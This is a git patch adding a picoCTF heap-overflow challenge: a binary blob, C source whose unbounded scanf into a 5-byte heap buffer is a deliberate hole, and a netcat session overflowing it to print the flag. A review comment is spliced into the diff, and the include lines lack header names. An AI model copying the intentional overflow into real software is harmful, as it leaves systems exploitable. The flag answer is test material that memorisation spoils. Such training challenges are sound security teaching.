From 955da6e6984b137622ee0ac26a38dbe0d4264837 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Tue, 3 Sep 2024 20:43:19 +0200
Subject: [PATCH] pwn/heap_0
---
pwn/heap_0/chall | Bin 0 -> 20664 bytes
pwn/heap_0/chall.c | 127 ++++++++++++++++++++++++++++++++++++++++++
pwn/heap_0/output.txt | 34 +++++++++++
3 files changed, 161 insertions(+)
create mode 100755 pwn/heap_0/chall
create mode 100644 pwn/heap_0/chall.c
create mode 100644 pwn/heap_0/output.txt
diff --git a/pwn/heap_0/chall b/pwn/heap_0/chall new file mode 100755 index 0000000000000000000000000000000000000000..952cbfe81a6cfe512ef79ddebd0afecae411bf4f GIT binary patch literal 20664 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 GWd93DK$DUH literal 0 HcmV?d00001 diff --git a/pwn/heap_0/chall.c b/pwn/heap_0/chall.c new file mode 100644 index 0000000..bb97e09 --- /dev/null +++ b/pwn/heap_0/chall.c 
@@ -0,0 +1,127 @@
+#include
+#include
+#include
+
+#define FLAGSIZE_MAX 64
+// amount of memory allocated for input_data
+#define INPUT_DATA_SIZE 5
+// amount of memory allocated for safe_var
+#define SAFE_VAR_SIZE 5
+
+int num_allocs;
+char *safe_var;
+char *input_data;
+
+void check_win() {
+ if (strcmp(safe_var, "bico") != 0) {
+ printf("\nYOU WIN\n");
+
+ // Print flag
+ char buf[FLAGSIZE_MAX];
+ FILE *fd = fopen("flag.txt", "r");
+ fgets(buf, FLAGSIZE_MAX, fd);
+ printf("%s\n", buf);
+ fflush(stdout);
+
+ exit(0);
+ } else {
+ printf("Looks like everything is still secure!\n");
+ printf("\nNo flage for you :(\n");
+ fflush(stdout);
+ }
+}
+
+void print_menu() {
+ printf("\n1. Print Heap:\t\t(print the current state of the heap)"
+ "\n2. Write to buffer:\t(write to your own personal block of data "
+ "on the heap)"
+ "\n3. Print safe_var:\t(I'll even let you look at my variable on "
+ "the heap, "
+ "I'm confident it can't be modified)"
+ "\n4. Print Flag:\t\t(Try to print the flag, good luck)"
+ "\n5. 
Exit\n\nEnter your choice: ");
+ fflush(stdout);
+}
+
+void init() {
+ printf("\nWelcome to heap0!\n");
+ printf(
+ "I put my data on the heap so it should be safe from any tampering.\n");
+ printf("Since my data isn't on the stack I'll even let you write whatever "
+ "info you want to the heap, I already took care of using malloc for "
+ "you.\n\n");
+ fflush(stdout);
+ input_data = malloc(INPUT_DATA_SIZE);
+ strncpy(input_data, "pico", INPUT_DATA_SIZE);
+ safe_var = malloc(SAFE_VAR_SIZE);
+ strncpy(safe_var, "bico", SAFE_VAR_SIZE);
+}
+
+void write_buffer() {
+ printf("Data for buffer: ");
+ fflush(stdout);
+ scanf("%s", input_data);
+}
+
+void print_heap() {
+ printf("Heap State:\n");
+ printf("+-------------+----------------+\n");
+ printf("[*] Address -> Heap Data \n");
+ printf("+-------------+----------------+\n");
+ printf("[*] %p -> %s\n", input_data, input_data);
+ printf("+-------------+----------------+\n");
+ printf("[*] %p -> %s\n", safe_var, safe_var);
+ printf("+-------------+----------------+\n");
+ fflush(stdout);
+}
+
+int main(void) {
+
+ // Setup
+ init();
+ print_heap();
+
+ int choice;
+
+ while (1) {
+ print_menu();
+ int rval = scanf("%d", &choice);
+ if (rval == EOF){
+ exit(0);
+ }
+ if (rval != 1) {
+ //printf("Invalid input. Please enter a valid choice.\n");
+ //fflush(stdout);
+ // Clear input buffer
+ //while (getchar() != '\n');
+ //continue;
+ exit(0);
+ }
+
+ switch (choice) {
+ case 1:
+ // print heap
+ print_heap();
+ break;
+ case 2:
+ write_buffer();
+ break;
+ case 3:
+ // print safe_var
+ printf("\n\nTake a look at my variable: safe_var = %s\n\n",
+ safe_var);
+ fflush(stdout);
+ break;
+ case 4:
+ // Check for win condition
+ check_win();
+ break;
+ case 5:
+ // exit
+ return 0;
+ default:
+ printf("Invalid choice\n");
+ fflush(stdout);
+ }
+ }
+}
diff --git a/pwn/heap_0/output.txt b/pwn/heap_0/output.txt
new file mode 100644
index 0000000..0c90d4f
--- /dev/null
+++ b/pwn/heap_0/output.txt
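Review bot: In check_win the `fopen("flag.txt", "r")` result is passed straight to `fgets` without a NULL check, so a missing or unreadable flag file crashes the service with a null dereference instead of reporting the problem, and `buf` is printed even when `fgets` fails and leaves it uninitialized; guard it with `if (!fd) { perror("flag.txt"); exit(1); }`, test the `fgets` return before the `printf`, and `fclose(fd)` afterwards. The unbounded `scanf("%s", input_data)` in write_buffer is the intended heap overflow for this challenge (output.txt shows it being exercised), so it should carry a comment such as `// intentionally unbounded: this is the challenge bug` rather than be quietly changed to a bounded `fgets` by a later cleanup. The three `#include` lines appear with their header names stripped, which looks like a rendering artifact of this page rather than the committed file, and `num_allocs` is declared but never used.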
@@ -0,0 +1,34 @@
+$ nc tethys.picoctf.net 62334
+
+Welcome to heap0!
+I put my data on the heap so it should be safe from any tampering.
+Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.
+
+Heap State:
++-------------+----------------+
+[*] Address -> Heap Data
++-------------+----------------+
+[*] 0x5fa8485542b0 -> pico
++-------------+----------------+
+[*] 0x5fa8485542d0 -> bico
++-------------+----------------+
+
+1. Print Heap: (print the current state of the heap)
+2. Write to buffer: (write to your own personal block of data on the heap)
+3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
+4. Print Flag: (Try to print the flag, good luck)
+5. Exit
+
+Enter your choice: 2
+Data for buffer: picopicopicopicopicopicopicopicopico
+
+1. Print Heap: (print the current state of the heap)
+2. Write to buffer: (write to your own personal block of data on the heap)
+3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
+4. Print Flag: (Try to print the flag, good luck)
+5. Exit
+
+Enter your choice: 4
+
+YOU WIN
+picoCTF{my_first_heap_overflow_e4c92a78}